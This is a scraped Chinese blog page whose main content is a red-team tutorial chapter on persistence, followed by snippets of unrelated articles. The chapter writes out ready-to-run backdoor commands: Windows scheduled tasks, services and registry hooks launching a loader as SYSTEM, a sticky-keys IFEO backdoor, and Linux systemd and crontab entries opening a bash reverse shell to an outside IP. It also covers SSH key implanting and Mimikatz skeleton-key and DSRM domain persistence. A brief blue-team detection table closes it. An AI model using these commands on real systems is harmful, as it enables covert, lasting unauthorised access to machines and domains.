news 2026/5/12 23:30:21

第四部分:持久化与防御规避

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
第四部分:持久化与防御规避

第九章:权限维持

核心逻辑:权限维持(Persistence)是红队在目标网络中建立长期立足点的关键。本章重点在于利用系统合法机制进行驻留,确保在系统重启、密码更改或漏洞修复后,仍能重新获得访问权限。


9.1 Windows 权限维持

9.1.1 计划任务 (Scheduled Tasks)

原理:利用 Windows Task Scheduler 在特定时间或事件下执行恶意载荷。

优势:稳定、隐蔽、权限高。

类型

命令示例

特点

创建任务

schtasks /create /sc minute /mo 1 /tn "WindowsUpdate" /tr "C:\temp\loader.exe" /ru SYSTEM

每分钟执行一次,SYSTEM 权限。

XML 配置

schtasks /create /xml task.xml /tn "GoogleUpdate"

使用 XML 文件精细控制触发器(如用户登录)。

COM 劫持

修改HKCU\Software\Classes\CLSID\{...}\InprocServer32

当特定程序调用 COM 组件时触发。

9.1.2 服务 (Services)

原理:将恶意程序注册为系统服务。

类型

命令示例

特点

创建服务

sc create "WindowsDefender" binPath= "C:\temp\loader.exe" start= auto

开机自启,SYSTEM 权限。

修改服务

sc config "Spooler" binPath= "C:\temp\loader.exe"

劫持合法服务(危险,易导致系统故障)。

9.1.3 注册表 (Registry)

原理:利用系统启动项或文件关联执行。

位置

说明

命令示例

Run Keys

用户登录时执行。

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Updater" /t REG_SZ /d "C:\temp\loader.exe"

Winlogon Helper

登录/注销时执行。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "userinit.exe,C:\temp\loader.exe"

Image File Execution Options (IFEO)

调试器劫持(如sethc.exe粘滞键后门)。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe"


9.2 Linux 权限维持

9.2.1 Systemd Services

原理:现代 Linux 发行版的标准初始化系统。

# 1. 创建服务文件 cat > /etc/systemd/system/systemd-update.service << EOF [Unit] Description=System Update Service After=network.target [Service] Type=simple ExecStart=/bin/bash -c "bash -i >& /dev/tcp/1.1.1.1/4444 0>&1" Restart=always RestartSec=60 [Install] WantedBy=multi-user.target EOF # 2. 启用并启动 systemctl daemon-reload systemctl enable systemd-update.service systemctl start systemd-update.service
9.2.2 Cron Jobs

原理:定时任务,最经典的维持方式。

位置

说明

/etc/crontab

系统级定时任务。

/var/spool/cron/root

Root 用户任务。

@reboot

系统重启时执行。

# 每5分钟反弹一次 Shell echo "*/5 * * * * root bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'" >> /etc/crontab
9.2.3 SSH 公钥植入

原理:无需密码,直接登录。

# 将公钥写入 authorized_keys mkdir -p /root/.ssh echo "ssh-rsa AAAA... your_key" >> /root/.ssh/authorized_keys chmod 700 /root/.ssh chmod 600 /root/.ssh/authorized_keys

9.3 域环境权限维持

9.3.1 DSRM (Directory Services Restore Mode)

原理:利用域控的还原模式账户(本地 Administrator)进行维持。

操作

  1. 获取 DSRM 密码(通常与域管理员相同)。

  2. 修改注册表允许 DSRM 账户远程登录。

  3. 使用 DSRM 账户登录域控,即使域管理员密码更改也有效。

9.3.2 Skeleton Key (万能钥匙)

原理:在域控内存中注入一个“万能密码”,允许使用任意用户名 + 万能密码登录。

工具:Mimikatz。

命令mimikatz # !processprotect /process:lsass.exe /remove->mimikatz # misc::skeleton

9.3.3 AdminSDHolder

原理:修改 AdminSDHolder 容器的 ACL,赋予特定用户域管权限。系统每 60 分钟会自动同步一次,将该权限应用到所有受保护的域管组。


9.4 防御视角(给蓝队)

技术

检测方法

加固建议

计划任务

schtasks /query /fo LIST /v
检查异常任务名、路径、作者。

限制普通用户创建任务;监控 Task Scheduler 日志。

服务

sc query
检查binPath是否指向异常目录。

启用服务变更审计;限制非系统服务路径。

注册表

Autoruns (Sysinternals)
扫描 Run Keys 和 IFEO。

限制注册表编辑权限;启用 Sysmon 监控注册表事件。

SSH 公钥

定期检查~/.ssh/authorized_keys

使用 SSH 证书认证,禁用密码登录。

域环境

Event ID 4662:目录服务访问。
Event ID 5136:目录服务对象修改。

定期重置 DSRM 密码;监控 LSASS 内存异常。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/12 23:22:30

从零构建AI聊天机器人:baibot开源项目架构解析与实战部署

1. 项目概述与核心价值 最近在开源社区里&#xff0c;一个名为 etkecc/baibot 的项目引起了我的注意。乍一看这个名字&#xff0c;你可能会联想到“AI”和“Bot”&#xff0c;没错&#xff0c;这正是一个围绕AI聊天机器人构建的开源项目。但和那些动辄需要复杂部署、庞大算力…

作者头像 李华
网站建设 2026/5/12 23:13:42

探秘C语言复合类型:结构体、枚举与联合体的核心机制与应用

1. 结构体&#xff1a;构建复杂数据模型的基石 结构体是C语言中最重要的复合数据类型之一&#xff0c;它允许我们将不同类型的数据组合成一个逻辑单元。想象一下&#xff0c;如果你要处理学生信息&#xff0c;需要同时记录姓名、学号和成绩。如果没有结构体&#xff0c;你可能需…

作者头像 李华
网站建设 2026/5/12 23:11:50

Taotoken用量看板与成本管理功能的实际使用体验

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 Taotoken用量看板与成本管理功能的实际使用体验 对于需要持续调用大模型API的项目而言&#xff0c;成本的可观测与可控性是管理中的…

作者头像 李华